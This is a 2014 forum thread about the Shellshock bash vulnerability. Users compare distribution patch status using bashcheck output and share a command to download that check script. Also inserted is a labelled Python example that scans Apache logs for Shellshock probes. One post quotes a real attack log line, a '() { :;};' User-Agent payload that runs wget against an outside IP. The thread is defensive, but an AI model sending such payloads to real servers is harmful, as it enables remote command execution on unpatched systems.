Strange... I just tried it on an x64 box and it reports the same version but does not present the date.
S.
Bash bug can let others take over your computer
- Snorkasaurus
- Berserk
- Posts: 587
- Joined: 30 Dec 2013, 19:19
Re: Bash bug can let others take over your computer
Yes that could be it
The patches must be mainly directed to 64bit since that is where most servers are. Private users are not that vulnerable; that is why Apple has not even reacted yet.
Manjaro 64bit on the main box -Intel(R) Core(TM) i7 CPU 920 @ 2.67GHz and nVidia Corporation GT200b [GeForce GTX 275] (rev a1. + Centos on the server - Arch on the laptop.
"There are no stupid questions - Only stupid answers!"
Shellshock explained - for dummies
Here is the Shellshock (bash bug) for dummies explanation. I think it makes this understandable for "normal" people.
And I love that last remark:
I hope you do not take advice from some guy on YouTube
Manjaro 64bit on the main box -Intel(R) Core(TM) i7 CPU 920 @ 2.67GHz and nVidia Corporation GT200b [GeForce GTX 275] (rev a1. + Centos on the server - Arch on the laptop.
"There are no stupid questions - Only stupid answers!"
- Snorkasaurus
- Berserk
- Posts: 587
- Joined: 30 Dec 2013, 19:19
Re: Bash bug can let others take over your computer
Here's an entry from my Win32 Apache logs from a couple of hours ago... people can be such assholes.
Code: Select all
82.221.128.246 - - [29/Sep/2014:14:03:03 -0400] "GET / HTTP/1.1" 200 53 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
S.
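Added example, not part of the thread or any poster's code: a small scanner that flags Apache combined-format log lines carrying the `() {` function-definition marker seen in the User-Agent of the entry above. The sample lines are constructed (documentation IP ranges, harmless payload text), and the function and variable names are illustrative.

```python
import re

# Apache "combined" log format. Quoted fields can hold backslash-escaped
# quotes (\"), which is how the probe in the entry above was logged.
QUOTED = r'"(?P<{}>(?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    + QUOTED.format("request")
    + r' (?P<status>\d{3}) \S+ '
    + QUOTED.format("referer") + " " + QUOTED.format("agent")
)

# "() {" opens a bash function definition; it does not normally appear in a
# request line, Referer or User-Agent.
FUNC_DEF_RE = re.compile(r'\(\)\s*\{')

# Constructed sample lines, modelled on the log entry quoted in the post.
SAMPLE_LOG = [
    '198.51.100.4 - - [29/Sep/2014:13:58:10 -0400] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    r'203.0.113.7 - - [29/Sep/2014:14:03:03 -0400] "GET / HTTP/1.1" '
    r'200 53 "-" "() { :;}; /bin/bash -c \"echo probe\""',
    r'203.0.113.9 - - [29/Sep/2014:14:05:41 -0400] "GET /cgi-bin/status HTTP/1.1" '
    r'404 209 "() { :; }; echo probe" "curl/7.38.0"',
]


def find_shellshock_probes(lines):
    """Return one record per line whose client-controlled fields contain '() {'."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        fields = [f for f in ("request", "referer", "agent")
                  if FUNC_DEF_RE.search(m[f])]
        if fields:
            hits.append({"line": lineno, "ip": m["ip"], "time": m["ts"],
                         "status": int(m["status"]), "fields": fields})
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} status={hit["status"]} '
              f'marker in: {", ".join(hit["fields"])}')
```

A hit records a probe, not a compromise: the header only matters where the server passes request headers to a bash-invoked program as environment variables, as CGI does, so the logged status code alone says nothing about whether a command ran.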
Re: Bash bug can let others take over your computer
Here is a bash-check from GitHub:
https://github.com/hannob/bashcheck/blo ... /bashcheck
Just do this and run it to check
Code: Select all
wget https://raw.githubusercontent.com/hannob/bashcheck/master/bashcheck -O bashcheck.sh && chmod +x bashcheck.sh
(The script might be updated so it makes sense to repeat the command from time to time).
./bashcheck.sh will run it - it will look something like this:
The script will check for:
Manjaro is still "vulnerable" to the last two (not so serious ones - since they cannot be exploited remotely) as is Debian 7. Centos 6.5 has fixed CVE-2014-6278 so they are in the lead.
Bash is getting a good check here - so other things might turn up.
But the serious one - Shellshock - is fixed on all Linux distros (that I have tested) so the vulnerability the press has been feasting on - is gone!
If you run rkhunter (rootkit detection program) then you will get a warning regarding bash - which is only normal - so you can reset it with
Code: Select all
sudo rkhunter --propupd
Manjaro 64bit on the main box -Intel(R) Core(TM) i7 CPU 920 @ 2.67GHz and nVidia Corporation GT200b [GeForce GTX 275] (rev a1. + Centos on the server - Arch on the laptop.
"There are no stupid questions - Only stupid answers!"
Re: Bash bug can let others take over your computer
A follow-up:
Manjaro and Arch are now completely fixed:
Code: Select all
./bashcheck.sh
and it reports:
Code: Select all
[viking@viking60-server ~]$ ./bashcheck.sh
Testing /usr/bin/bash ...
GNU bash, version 4.3.30(1)-release (x86_64-unknown-linux-gnu)
Variable function parser pre/suffixed [%%, upstream], bugs not exploitable
Not vulnerable to CVE-2014-6271 (original shellshock)
Not vulnerable to CVE-2014-7169 (taviso bug)
Not vulnerable to CVE-2014-7186 (redir_stack bug)
Test for CVE-2014-7187 not reliable without address sanitizer
Not vulnerable to CVE-2014-6277 (lcamtuf bug #1)
Not vulnerable to CVE-2014-6278 (lcamtuf bug #2)
checking "the others" now
Debian 7 does still report
Code: Select all
Found non-exploitable CVE-2014-6277 (lcamtuf bug #1)
Found non-exploitable CVE-2014-6278 (lcamtuf bug #2)
So they have not come as far as Arch and Manjaro - but it is no dangerous bug so..
Mageia is all good. Centos 6.5 does still report
Code: Select all
Found non-exploitable CVE-2014-6277 (lcamtuf bug #1)
which is a no problem bug...
In OpenSUSE 13.2RC both of the bottom vulnerabilities are still open (again; no biggie)
I very much suspect that the bottom two bugs do provide some functionality that server customers rely upon - heavy server distros like Centos Debian and SUSE are very much aware of the bugs - so I doubt that it is an oversight. Patching them could maybe cause more problems than leaving them?
Manjaro 64bit on the main box -Intel(R) Core(TM) i7 CPU 920 @ 2.67GHz and nVidia Corporation GT200b [GeForce GTX 275] (rev a1. + Centos on the server - Arch on the laptop.
"There are no stupid questions - Only stupid answers!"